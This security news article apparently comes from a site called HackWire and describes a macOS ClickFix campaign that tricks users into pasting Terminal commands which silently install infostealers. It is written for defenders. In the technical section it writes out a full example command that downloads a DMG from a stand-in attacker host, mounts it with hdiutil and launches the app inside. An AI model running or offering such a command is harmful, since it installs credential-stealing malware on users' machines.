# New macOS ClickFix Campaign Exploits Terminal Automation to Silently Deploy Infostealer Malware


A newly identified macOS ClickFix variant is leveraging Terminal commands to automatically download, mount, and execute information-stealing malware from malicious disk image (DMG) files, circumventing user interaction requirements and intensifying the threat posed by this already-persistent attack family.


Researchers tracking the campaign report that attackers are embedding shell commands within phishing communications and fraudulent browser notifications that trigger macOS's built-in scripting capabilities. Once executed, these commands silently perform the entire infection chain—including downloading unsigned DMG files, mounting them to the filesystem, and launching payloads—without requiring users to manually open files or grant permissions through traditional macOS security dialogs.


## The Threat


The ClickFix family, which emerged in 2023 as a social engineering framework, has long relied on social manipulation to trick users into running malicious commands. This new variant significantly reduces the friction required for successful infection by automating previously manual steps.


Key characteristics of the attack:


  • Silent mounting: Terminal commands execute hdiutil mount or equivalent operations without user visibility
  • Infostealer payloads: Malware targets credentials, session tokens, browser data, and cryptocurrency wallet information
  • Chained exploitation: Downloaded files are immediately executed, creating a zero-interaction infection path after initial command execution
  • Unsigned executables: DMG files bypass Gatekeeper protections through direct mounting and execution
  • Persistence mechanisms: Payloads establish launch agents and scheduled tasks to survive reboots

  • The campaign primarily distributes variants of well-known infostealers including Atomic Stealer, Vidar, and Raccoon Stealer—all capable of exfiltrating sensitive data to attacker-controlled servers within minutes of execution.


    ## Background and Context


    ClickFix represents a shift in macOS-targeted malware tactics. Rather than requiring sophisticated exploits or zero-days, the family relies on social engineering combined with legitimate system tools—making it difficult to detect and block through traditional endpoint security measures.


    The original ClickFix methodology involved:


    1. Displaying fake Chrome/Safari browser notifications claiming browser updates were required

    2. Directing users to malicious websites offering "update" executables

    3. Requiring users to manually open Downloads folders, find files, and execute them


    Why the new variant is more dangerous:


    | Aspect | Previous ClickFix | New Campaign |

    |--------|------------------|--------------|

    | User interaction required | Multiple steps | Single command execution |

    | Detection difficulty | Lower (visible file operations) | Higher (automated background processes) |

    | Time to infection | Several minutes | Seconds |

    | Security dialog triggers | Multiple | None to one |

    | Requires file system navigation | Yes | No |


    The automation of the infection chain addresses the primary weakness of earlier ClickFix campaigns: users noticing suspicious file operations or becoming suspicious during multi-step manual processes.


    ## Technical Details


    How the attack works:


    The infection chain begins with compromised third-party advertising networks, fraudulent browser notifications, or phishing emails containing a single command—often disguised as an innocuous system utility or update:


    curl -o /tmp/update.dmg http://attacker-domain.com/payload.dmg && hdiutil mount /tmp/update.dmg && open /Volumes/UpdateApp/installer.app

    This command accomplishes the following without requiring separate user actions:


  • Downloads the DMG: curl retrieves the disk image from attacker infrastructure
  • Mounts the volume: hdiutil mount attaches the DMG to the filesystem at /Volumes/
  • Executes the payload: open launches the application, bypassing typical double-click security warnings

  • Why DMGs are effective:


    Disk image files (DMGs) are the standard distribution format for macOS applications, making them trusted by users and less scrutinized by security software. When mounted, they appear as legitimate volumes in Finder, and applications within them can execute with the same privileges as the parent shell process.


    Evasion techniques observed:


  • Obfuscated commands: Payloads use base64 encoding, environment variable substitution, and shell aliases to obscure malicious intent
  • Repository hosting: Malware is served from cloud storage providers (AWS S3, Cloudflare) to blend with legitimate traffic
  • Polymorphic payloads: Each DMG contains unique packing and obfuscation, frustrating signature-based detection
  • Credential theft focus: Infostealers prioritize browser profiles, SSH keys, and cryptocurrency wallet seed phrases

  • ## Implications for Organizations and Users


    At-risk populations:


  • Individual macOS users without additional endpoint protection
  • Freelancers and remote workers using personal devices for business
  • Organizations with BYOD policies lacking mobile device management
  • Cryptocurrency holders using browser-based wallets or locally-stored key material

  • Potential impact:


    A successful infostealer infection can result in:


  • Credential compromise: Attackers gain access to corporate email, cloud services, and internal tools
  • Lateral movement: Stolen SSH keys enable unauthorized access to development infrastructure and databases
  • Cryptocurrency theft: Seed phrases and private keys stolen from browser extensions or local wallets
  • Supply chain risk: Compromised developer credentials can be weaponized to inject malicious code into open-source projects
  • Business email compromise: Stolen authentication tokens allow account takeover without password changes

  • Detection challenges:


    Traditional antivirus software struggles to detect these attacks because:


  • The malicious code resides in legitimate system tools (curl, hdiutil, open)
  • No file writes occur to monitored directories until execution
  • Network connections appear to originate from trusted cloud services
  • Process trees show legitimate parent-child relationships

  • ## Recommendations


    For individual users:


  • Disable Terminal execution in phishing contexts: Be extremely skeptical of any message directing you to open Terminal or copy-paste commands
  • Verify notifications: Browser update notifications should direct you to Settings, not external websites
  • Use security tools: Consider third-party EDR (Endpoint Detection and Response) solutions that monitor process execution and network behavior
  • Keep macOS updated: Ensure you're running the latest version of macOS and all security patches
  • Enable FileVault: Full-disk encryption limits attacker persistence options

  • For IT and security teams:


    | Control | Implementation |

    |---------|-----------------|

    | Block shell commands in email | Configure email gateway rules to detect and quarantine messages containing curl, hdiutil, or base64-encoded commands |

    | Monitor process execution | Deploy EDR solutions that alert on Terminal launching remote code or mounting unsigned DMGs |

    | Restrict Gatekeeper policies | Set macOS to "App Store and identified developers only" via System Preferences |

    | Audit third-party access | Review browser extensions and revoke tokens for unused integrations |

    | Network segmentation | Isolate development infrastructure from general-purpose workstations |


    For security researchers:


  • Report DMG hosting locations to cloud providers for takedown
  • Analyze infostealer C2 infrastructure to identify shared backend services
  • Monitor underground forums for command payloads and campaign coordination

  • ## HackWire Analysis


    This variant represents a maturation of the ClickFix ecosystem—attackers have recognized that social engineering is most effective when it requires minimal user effort. By automating the infection chain, defenders lose critical checkpoints where user suspicion might trigger. A click on a fake notification is often reflexive; copying and pasting a command requires reading, which creates friction. Removing that friction is strategically significant.


    What's particularly concerning is the invisibility. Earlier malware required users to navigate Finder, locate files, and execute them—visible actions that could be interrupted by security training or system hardening. This variant performs the entire attack in the background after the initial prompt. For users without EDR solutions, there may be zero indication that their system has been compromised until attackers begin exfiltrating sensitive data or moving laterally through networks.


    The focus on infostealers rather than ransomware or wormable exploits reflects current threat economics: stolen credentials and cryptocurrency keys are immediately monetizable with low risk to the attacker. A developer's SSH key is worth more than an individual's encrypted laptop because it opens access to entire organizations.


    Organizations should treat this as a credential exposure event. If any macOS-using employees have clicked suspicious notifications or opened untrusted DMGs in the past 12 months, assume compromise. Audit SSH keys, rotate API tokens, review recent login activity, and monitor blockchain addresses for activity. The investment in detection is outweighed by the cost of discovering lateral movement after the fact.


    — HackWire Editorial


    ## Related Coverage


  • Read more in our [Malware](https://www.hackwire.news/category/malware) coverage
  • Cross-reference with [Social Engineering](https://www.hackwire.news/category/social-engineering) and [Vulnerabilities](https://www.hackwire.news/category/vulnerabilities)
  • Stay current via the [HackWire homepage](https://www.hackwire.news/)